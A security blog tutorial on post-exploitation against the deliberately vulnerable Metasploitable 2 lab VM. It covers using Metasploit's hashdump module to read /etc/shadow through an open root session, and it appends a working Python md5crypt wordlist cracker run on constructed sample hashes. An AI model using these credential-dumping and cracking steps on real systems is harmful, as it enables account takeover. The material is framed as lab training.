Thursday, October 13, 2016

Pwning Metasploitable 2: Post Exploitation - Dumping Password Hashes

In our previous exploitation articles we successfully opened sessions on our target machine. Once you have a session you can do a great deal on the target with the right tools, and Metasploit ships with most of those tools as post-exploitation modules.

I'll have to admit we have been skipping a few details during exploitation. When you use an exploit you also choose a payload: the code the exploit delivers and runs on the target once it succeeds, for example a plain command shell or a Meterpreter session. Think of the payload as the toolkit you go in with; a Meterpreter session gives you far more to work with than a bare shell. We will show you how to choose and use payloads in later articles.

Post exploitation is what you do after breaking into the target machine. Let's look at a post-exploitation example where we dump the password hashes of every user on the target system.

Get an open session 


Follow any of our previous exploitation articles to help you get an open session with the target machine. 

Post exploitation 


Hit Ctrl+Z to put the session into the background (inside a Meterpreter session you can also type background). Enter y when asked "Background session 1? [y/N]".



The session is still open; it has only been moved to the background so that you get the msfconsole prompt back.

You can have multiple open sessions in the background. 

Check your sessions using the command: sessions (or sessions -l). Note the Id column; you will need it in a moment.



Enter the command: use post/linux/gather/hashdump
Enter the command: show options

The first command selects the hashdump post module; the second shows the options it takes. Metasploit keeps its post-exploitation modules under the post directory of its module tree, grouped by platform and purpose (linux/gather here). We will go through other post modules in later articles.

One caveat before you run it: this module reads /etc/passwd and /etc/shadow on the target, and /etc/shadow is only readable by root, so the session it runs in must be a root session or the module will fail. If you are not sure what user your session is running as, interact with it (sessions -i 1), run id, and then background it again.



Normally we set RHOST on an exploit to point it at a target. A post module instead works through a session you already have, so the option it needs is SESSION.

Enter the command: set SESSION 1

The "1" in the command simply corresponds to the session Id you want the module to run against. You can see the Ids in the output of the sessions command shown above.



...and run (exploit works as well; for post modules, run is the conventional command).



What you see on your screen are password hashes, one line per account in the format user:hash:uid:gid:gecos:home:shell, which is the /etc/passwd entry with the hash from /etc/shadow dropped into the password field. The module also saves the raw passwd and shadow files and an unshadowed copy to your loot directory (check with the loot command), so you do not have to copy the output by hand. A hash cannot be typed into a login prompt; it has to be cracked with a password-cracking tool such as John the Ripper or hashcat, usually with a wordlist, to recover the plain-text password you can then use on login fields. Accounts whose hash field is "*" or starts with "!" are locked and have nothing to crack. On Metasploitable 2 the hashes are md5crypt (they start with $1$) and the default passwords are weak, so a wordlist attack recovers most of them in seconds.
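To make the cracking step concrete, here is an added example (not code from the original post or from Metasploit) that takes the module's output as text, classifies each account by its hash scheme, writes the crackable ones out in the user:hash form John the Ripper and hashcat accept, and runs a wordlist attack using a from-scratch implementation of md5crypt, the $1$ scheme Metasploitable 2 uses. The sample dump and wordlist are constructed: the msfadmin salt and hash are the pair published for the stock Metasploitable 2 image (password msfadmin), the root hash is generated in the script with a made-up password, and the remaining accounts are invented to show locked, empty and non-md5crypt entries.

```python
"""Triage post/linux/gather/hashdump output and crack the md5crypt entries.

Added example; not the blog's or Metasploit's own code. Sample data is constructed.
"""
import hashlib
import re

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def md5crypt(password, salt, magic="$1$"):
    """Poul-Henning Kamp's md5crypt, the algorithm behind $1$ shadow hashes."""
    pw = password.encode()
    salt = salt[:8]                      # the scheme uses at most 8 salt characters
    sb = salt.encode()
    ctx = hashlib.md5(pw + magic.encode() + sb)
    alt = hashlib.md5(pw + sb + pw).digest()
    for pl in range(len(pw), 0, -16):    # mix in len(pw) bytes of MD5(pw, salt, pw)
        ctx.update(alt[:min(16, pl)])
    i = len(pw)
    while i:                             # the odd bit-walk over len(pw) from the original
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for r in range(1000):                # 1000 stretching rounds
        c = hashlib.md5()
        c.update(pw if r & 1 else final)
        if r % 3:
            c.update(sb)
        if r % 7:
            c.update(pw)
        c.update(final if r & 1 else pw)
        final = c.digest()

    def to64(v, n):                      # crypt-style base64, low 6 bits first
        out = ""
        for _ in range(n):
            out += ITOA64[v & 0x3F]
            v >>= 6
        return out

    groups = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    enc = "".join(to64(final[a] << 16 | final[b] << 8 | final[c], 4) for a, b, c in groups)
    enc += to64(final[11], 2)
    return magic + salt + "$" + enc


PREFIXES = [("$1$", "md5crypt"), ("$2a$", "bcrypt"), ("$2b$", "bcrypt"), ("$2y$", "bcrypt"),
            ("$5$", "sha256crypt"), ("$6$", "sha512crypt"), ("$7$", "scrypt"), ("$y$", "yescrypt")]


def classify(hash_field):
    """Name the crypt scheme of a shadow hash field, or flag accounts with none."""
    if hash_field == "":
        return "empty"        # no password at all: login with an empty password works
    if hash_field.startswith(("!", "*")):
        return "locked"       # nothing to crack (the account may still have SSH keys)
    for prefix, name in PREFIXES:
        if hash_field.startswith(prefix):
            return name
    if re.fullmatch(r"[./0-9A-Za-z]{13}", hash_field):
        return "descrypt"     # traditional 13-character DES crypt
    return "unknown"


def parse_hashdump(text):
    """Turn the module's 'user:hash:uid:gid:gecos:home:shell' lines into dicts."""
    entries = []
    for line in text.splitlines():
        line = re.sub(r"^\[[+*!-]\]\s*", "", line.strip())   # drop msfconsole status tags
        parts = line.split(":")
        if len(parts) != 7:                                   # loot paths, status lines
            continue
        user, h, uid, gid, _gecos, home, shell = parts
        entries.append({"user": user, "hash": h, "uid": int(uid), "gid": int(gid),
                        "home": home, "shell": shell, "scheme": classify(h)})
    return entries


def to_john(entries):
    """user:hash lines for the crackable accounts, ready for john or hashcat."""
    return "\n".join(f"{e['user']}:{e['hash']}" for e in entries
                     if e["scheme"] not in ("locked", "empty", "unknown"))


def crack_md5crypt(entries, wordlist):
    """Wordlist attack on the $1$ entries; returns {user: password} for the hits."""
    found = {}
    for e in entries:
        if e["scheme"] != "md5crypt":
            continue
        salt = e["hash"].split("$")[2]   # "$1$<salt>$<hash>"
        for word in wordlist:
            if md5crypt(word, salt) == e["hash"]:
                found[e["user"]] = word
                break
    return found


# Constructed sample in the module's output format (see the lead-in for provenance).
SAMPLE_DUMP = f"""\
[+] root:{md5crypt('toor', 'Kz3ab9Qx')}:0:0:root:/root:/bin/bash
[+] daemon:*:1:1:daemon:/usr/sbin:/bin/sh
[+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
[+] backup:!:34:34:backup:/var/backups:/bin/sh
[+] guest::1003:1003:,,,:/home/guest:/bin/bash
[+] svc:$6$Jv9r2QpL$constructedsha512cryptvalue:1002:1002:,,,:/home/svc:/bin/bash
[*] Unshadowed Password File: /root/.msf4/loot/constructed_example.txt
[*] Post module execution completed
"""
WORDLIST = ["123456", "password", "root", "msfadmin", "toor"]   # constructed, tiny

if __name__ == "__main__":
    found = parse_hashdump(SAMPLE_DUMP)
    for e in found:
        print(f"{e['user']:10} {e['scheme']}")
    print(to_john(entries := found))
    print(crack_md5crypt(entries, WORDLIST))
```

The sha512crypt entry is deliberately left uncracked: the script only implements $1$, which is all Metasploitable 2 needs, and hands anything else to john or hashcat via the to_john output. Locked and empty accounts are kept in the parsed list because they still tell you something (an empty hash field means a passwordless login), but they never reach the cracker.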


-Jayesh Kerai (@secjay)
